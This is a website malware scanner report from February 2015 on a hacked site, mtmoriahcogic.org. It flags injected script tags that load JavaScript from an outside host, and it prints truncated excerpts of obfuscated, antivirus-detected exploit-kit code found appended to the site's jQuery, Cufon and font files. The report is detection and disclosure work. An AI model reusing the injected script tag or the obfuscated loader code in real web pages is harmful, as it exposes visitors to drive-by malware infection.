
Malware Scanner report for mtmoriahcogic.org

Malicious/Suspicious/Total urls checked
6/9/15
All 15 checked URLs contain malicious or suspicious code (6 malicious, 9 suspicious). See details below.
Blacklists
Found
The website is marked by Google as suspicious.

The website "mtmoriahcogic.org" has probably been hacked and may be losing visitors as a result. Take action as soon as possible to fix the security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mtmoriahcogic.org

Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://mtmoriahcogic.org/
200 OK
Content-Length: 10533
Content-Type: text/html
suspicious
Suspicious code found (a script tag in the page that loads JavaScript from an external host):

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622358"></script>

http://mtmoriahcogic.org/js/jquery-1.7.1.min.js
200 OK
Content-Length: 98158
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<html><body>"),ci.close();d=c
... 3151 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ikarus
Trojan.JS.Quidvetis
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
Comodo
Exploit.JS.Expack.G
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Neclu.D
Fortinet
JS/Blacole.EU!tr.dldr
Norman
Iframer.BI

http://mtmoriahcogic.org/js/cufon-yui.js
200 OK
Content-Length: 2733
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

7:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:
... 1762 bytes are skipped ...
rt = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}}
/*/a9a007*/

Antivirus reports:

AntiVir
JS/Blacole.NX
Avast
JS:Includer-AJE [Trj]
Ikarus
Trojan.JS.IFrame
TrendMicro-HouseCall
TROJ_GEN.F47V1230
Comodo
UnclassifiedMalware
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
JS.IFrame.500
Microsoft
Trojan:JS/Quidvetis.A
McAfee
JS/Exploit-Blacole.eu
Norman
Blacole.XE

http://mtmoriahcogic.org/js/cufon-replace.js
200 OK
Content-Length: 6733
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

Cufon.replace('.slogan-top,.gallery-slogan span', { fontFamily: 'Beautiful ES'});
Cufon.replace('.sf-menu > li > a ', { fontFamily: 'OptimusPrincepsSemiBold',textShadow:'1px 1px #19100a',hover:true});
Cufon.replace('.soc span ', { fontFamily: 'OptimusPrincepsSemiBold'});
Cufon.replace('.gallery-slogan strong ', { fontFamily: 'OptimusPrincepsSemiBold',letterSpacing:'-7px'});

... 3039 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ikarus
JS.Exploit.BlackHole
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
TrendMicro-HouseCall
TROJ_GEN.F47V0101
Comodo
Exploit.JS.Expack.G
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Neclu.D
NANO-Antivirus
Trojan.Script.Expack.chwlwn
Norman
Blacole.XE
GData
Win32.Trojan.Agent.NUCFI9

http://mtmoriahcogic.org/js/Beautiful_ES_italic_400.font.js
200 OK
Content-Length: 41237
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

Cufon.registerFont({"w":86,"face":{"font-family":"Beautiful ES","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 8 0 0 9 0 2","ascent":"288","descent":"-72","x-height":"3","cap-height":"6","bbox":"-167.381 -270 365.782 146.271","underline-thickness":"10.8","underline-position":"-37.8","slope":"-39","unicode-range":"U 0020-U 007E"},"glyphs":{" ":{"w":55},"!":{"d":"28,-25v47,-44,99,-96,82,-97v-9,0,-17,3,-22,11xm30,-13v-10,-10,-29,5,-19,16v7,1
... 3033 bytes are skipped ...
rt = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}}
/*/a9a007*/

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ikarus
Trojan.JS.Quidvetis
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
TrendMicro-HouseCall
TROJ_GEN.F47V0101
Comodo
Exploit.JS.Expack.G
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Neclu.D
McAfee
JS/Exploit-Blacole.eu
NANO-Antivirus
Trojan.Script.Expack.chwlwn
Norman
Blacole.XE
GData
Win32.Trojan.Agent.OFVB2Q

http://mtmoriahcogic.org/js/OptimusPrincepsSemiBold_600.font.js
200 OK
Content-Length: 38218
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

Cufon.registerFont({"w":85,"face":{"font-family":"OptimusPrincepsSemiBold","font-weight":600,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 5 6 0 0 2 0 4","ascent":"288","descent":"-72","bbox":"0.745166 -297.207 519 91.0637","underline-thickness":"7.2","underline-position":"-44.28","unicode-range":"U 0020-U 007D"},"glyphs":{" ":{"w":87},"!":{"d":"43,-247v-62,-7,-32,128,-21,180v2,2,8,1,8,-2xm7,-37v-2,24,36,27,37,4v2,-21,-37,-29,-37,-4","w":50},"\"":{"d":"72,-192r6,-81v0,-9,-6,-16,
... 3033 bytes are skipped ...
rt = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}}
/*/a9a007*/

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ikarus
Trojan.JS.Quidvetis
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
TrendMicro-HouseCall
TROJ_GEN.F47V0101
Comodo
Exploit.JS.Expack.G
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Neclu.D
McAfee
JS/Exploit-Blacole.eu
NANO-Antivirus
Trojan.Script.Expack.chwlwn
Norman
Blacole.XE
GData
Win32.Trojan.Agent.OFVB2Q

http://mtmoriahcogic.org/js/script.js
200 OK
Content-Length: 3847
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5
... 2876 bytes are skipped ...
rt = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}}
/*/a9a007*/

Antivirus reports:

AntiVir
JS/Blacole.NX
Avast
JS:Includer-AJE [Trj]
Ikarus
Trojan.JS.IFrame
TrendMicro-HouseCall
TROJ_GEN.F47V1230
Comodo
UnclassifiedMalware
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
JS.IFrame.500
Microsoft
Trojan:JS/Quidvetis.A
McAfee
JS/Exploit-Blacole.eu
Norman
Blacole.XE

http://mtmoriahcogic.org/index.html
200 OK
Content-Length: 10533
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622358"></script>

http://mtmoriahcogic.org/index-1.html
200 OK
Content-Length: 9637
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622342"></script>

http://mtmoriahcogic.org/index-2.html
200 OK
Content-Length: 9025
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622344"></script>

http://mtmoriahcogic.org/index-7.html
200 OK
Content-Length: 8047
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622354"></script>

http://mtmoriahcogic.org/more.html
200 OK
Content-Length: 9456
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622362"></script>

http://mtmoriahcogic.org/index-3.html
200 OK
Content-Length: 5527
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622346"></script>

http://mtmoriahcogic.org/index-4.html
200 OK
Content-Length: 8137
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622348"></script>

http://mtmoriahcogic.org/index-5.html
200 OK
Content-Length: 9256
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622350"></script>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mtmoriahcogic.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 11:05:31 GMT
Accept-Ranges: bytes
ETag: "e2253e8-2925-50e7c7c25fd84"
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 10533
Content-Type: text/html
Last-Modified: Sat, 07 Feb 2015 09:51:45 GMT

...10533 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mtmoriahcogic.org
Referer: http://www.google.com/search?q=mtmoriahcogic.org

Result:
The result is similar to the first query. No suspicious redirects were found for either the normal visit or the visit with a search-engine Referer header.